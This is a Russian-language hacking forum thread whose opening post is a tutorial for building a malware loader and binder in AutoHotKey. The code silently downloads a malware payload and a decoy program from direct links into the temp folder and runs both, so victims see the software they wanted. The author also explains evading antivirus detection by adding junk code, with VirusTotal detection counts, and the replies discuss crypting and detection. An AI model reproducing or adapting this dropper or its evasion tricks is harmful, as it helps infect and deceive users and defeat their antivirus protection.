Загрузка...

Авторская статья Делаем склеивание и лоадер своими руками! 0 вложений!

Тема в разделе Вирусология создана пользователем ОхранникОффтопа 4 май 2019. (поднята 4 май 2019) 8653 просмотра

Загрузка...
  1. ОхранникОффтопа
    ОхранникОффтопа Автор темы 4 май 2019 1438 12 янв 2019
    Здарова ребят, сегодня я покажу бесплатный способ сделать простенький лоадер для вашего мальваря.
    Помимо всей лёгкости этого дела, данному лоадеру очень легко чистить детекты.

    Почему это лучше покупных лоадеров?
    А вам нравится каждую неделю платить за чистку детектов? Если вы конечно, не умеете сами криптовать файлы.
    Здесь же всё очень просто, и вы не рискуете своим мальварём, ибо пользователь с ним напрямую не контактирует.
    А также нет зависимостей и не нужны права администратора.

    Язык программирования: AutoHotKey. Уровень сложности: тупой сампер. Поехали! :roflanebalo:

    Для начала, где будем писать?
    Да где угодно, хоть в блокноте, главное потом текстовому файлу изменить разрешение на .ahk
    Но для своей удобности я воспользуюсь SciTE4AutoHotKey, Т9 на функции, компилятор и прочие приколюхи.
    Также устанавливаем библиотеку AutoHotKey с официального сайта — autohotkey.com

    С чего начнём?
    Начнём с того, что обозначим, что наша программа будет работать без иконки в трее.
    Код
    #NoTrayIcon
    Далее, загружаем склеиваемый файл и сам мальварь на хостинг, или ФО. Главное чтобы на них была прямая ссылка.
    После этого, вставляем 2 функции загрузки файла, с сохранением в временное хранилище.

    Код
    #NoTrayIcon

    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe
    Первый файл - пусть будет условно наш ******.
    Второй файл - софт, который просто нужен жертве.

    Далее, запускаем цикл, который проверяет файлы на наличие, и после их обнаружения запускающий их.

    Код
    #NoTrayIcon

    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

    Loop
    {
    IfExist, %A_Temp%\st.exe
    {
    IfExist, %A_Temp%\keymaker.exe
    {
    Run, %A_Temp%\keymaker.exe
    Run, %A_Temp%\st.exe
    Sleep, 1000
    ExitApp
    }
    }
    }
    IfExist проверяет наличие файлов в временном хранилище. После проверки, если она успешная, запускаются 2 файла, наш мальварь, и софт который собственно нужен жертве.
    Далее просто лоадер закрывается, пользователь работает с софтом который ему нужен, а мальварь выполняет своё дело.

    Как чистить детекты?
    Очень просто, добавляем бесполезную нагрузку в код софта, например присваиваем переменным различные значения:
    Код

    #NoTrayIcon

    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

    Loop
    {
    IfExist, %A_Temp%\st.exe
    {
    IfExist, %A_Temp%\keymaker.exe
    {
    Run, %A_Temp%\keymaker.exe
    Run, %A_Temp%\st.exe
    Sleep, 1000
    ExitApp
    }
    }
    }




    A:= 228
    B:= A
    C:= "fqfqfvwg"
    B:= C
    A:= 25868
    После этого, детект чистится.

    После написания компилируем в exe и радуемся.
    Вес билда ~ 700 кб.
    [IMG]

    После компиляции у софта будет такая иконка:
    [IMG]
    Для установления кастомной иконки воспользуемся компилятором от AutoHotKey.
    Переходим по пути: Ваш путь\AutoHotkey\Compiler
    Запускаем Ahk2Exe, и в строке Custom Icon выбираем свою иконку, компилируем.
    [IMG]

    Также добавлю из своих наблюдений касательно детектов:
    Начальный детект - 2/70
    Спустя 2-3 дня детект - не более 6/70
    При этом начальный детект составляет 2 нонейм АВ, а в конечном там максимум окажется Kaspersky.
    И это всё учитывая то, что я намеренно сливал на VirusTotal для проверки данной информации.
    Так что у Вас может быть всё куда круче!

    Вот и всё, вроде бы рассказал обо всех аспектах этого дела.
    Надеюсь кому-нибудь будет полезна эта информация, и сэкономит не мало деньжат.
    Всем спасибо :vinny:
     
    4 май 2019 Изменено
  2. ayan2030
    ayan2030 4 май 2019 Заблокирован(а) 8 27 фев 2017
    sharaskidaem а что если наш мальварь с детектами?
     
  3. Tawer1337
    Tawer1337 4 май 2019 ✵✵✵✵✵✵✵✵ 531 22 окт 2016
    ayan2030, сделать крипт для малваря, не?
     
  4. ОхранникОффтопа
    ОхранникОффтопа Автор темы 5 май 2019 1438 12 янв 2019
    Народ жду вашего мнения)
     
  5. NikitaJoy1992
    NikitaJoy1992 5 май 2019 Заблокирован(а) 180 4 ноя 2017
    Очень хорошая тема !
     
  6. Cal_inactive496112
    Чистим детекты добавлением мусорного кода, пизда
     
  7. PashaPlay
    PashaPlay 5 май 2019 2 14 июн 2017
    + Годная тема !
     
  8. ОхранникОффтопа
    ОхранникОффтопа Автор темы 5 май 2019 1438 12 янв 2019
    Я всегда проверяю то, что публикую.
    Детект на минимале держится несколько дней, это работает, хотя и звучит не очень
    Плюс к этому добавить стоит что ЯП этот не юзался вообще для мальваря, так что для антивирусов это что-то новое
     
  9. whom
    whom 6 май 2019 Качественная разработка lolz.live/threads/7145903
  10. whom
    whom 6 май 2019 Качественная разработка lolz.live/threads/7145903
  11. TomRedl
    TomRedl 6 май 2019 333 8 мар 2018
    Чел в любом случае сольет лоадер на вирус тотал , а вирус тотал найдет в лоадере ******* . так что он не защитит вас от "юзеров"
     
  12. ОхранникОффтопа
    ОхранникОффтопа Автор темы 7 май 2019 1438 12 янв 2019
    Уже неделю детекты не повышаются на ******е, каждые 2-3 дня лоадеру чищу и всё
     
  13. TomRedl
    TomRedl 7 май 2019 333 8 мар 2018
    ОхранникОффтопа, Возьми хеш своего *******а md5 либо sha не ебу , и чекни не лежит ли он на вт , тогда и поймешь
     
  14. ОхранникОффтопа
    ОхранникОффтопа Автор темы 7 май 2019 1438 12 янв 2019
    Да я и до того как эту херь придумал юзал его, естественно лежит.
    Но прикол в том, что реально уже неделю детекты не повышаются на ******е. При том, что я свой же лоадер специально на ВТ заливал для чека.
     
  15. Енот272_inactive171964
    Енот272_inactive171964 7 май 2019 Ушел на покой 372 6 сен 2017
    URLDownloadToFile winapi функция которую спокойно палит любой ав и дефендер на ратайме. какого хуя тут вообще это обсуждается, если сам смысл обсуждения похерен
     
  16. Енот272_inactive171964
    Енот272_inactive171964 7 май 2019 Ушел на покой 372 6 сен 2017
    >> лоадер специально на ВТ заливал
    КАК ЖЕ ВЕСЕЛО БЛЯД
     
  17. ОхранникОффтопа
    ОхранникОффтопа Автор темы 7 май 2019 1438 12 янв 2019
    Дефендер не ругается на него, проверь, потом уже говори)
    Весь прикол в том, что всем похуй на лоадер, кроме антивирусов. А прятать его от них приходится всего раз в 2-3 дня уделяя минут 5 времени. И то за пару дней только детектов 3-5 набежит, и всё. Я поэтому и запостил это сюда, потому что это пздц как дёшево и легко
     
  18. Енот272_inactive171964
    Енот272_inactive171964 7 май 2019 Ушел на покой 372 6 сен 2017
    мужик, рекомендую если вкатываешься в малварь, очень глубоко изучать винапи и то какие функции и как палятся. мне проверять незачем, я проверил все до тебя уже сотни раз. ты новичек, я это вижу. но не думай что ты пересек ту черту нубства, которую я пересек 1.5 года тому назад.
     
  19. ОхранникОффтопа
    ОхранникОффтопа Автор темы 10 май 2019 1438 12 янв 2019
    Полтора года не научили тебя проверять то, о чём говоришь. Я проливал уже на этот лоадер, абсолютно всем похуй на него, поверь. Просто возьми и сам это сделай, если тебе так не верится, что дефендеру на него абсолютно плевать, а антивирусы без детектов и подавно хуй клали на него
     
  20. hakzcode
    hakzcode 21 май 2019 Заблокирован(а) 5 3 май 2019
    Годно, так и хочется симпу въебать, но не могу ._.
     
Top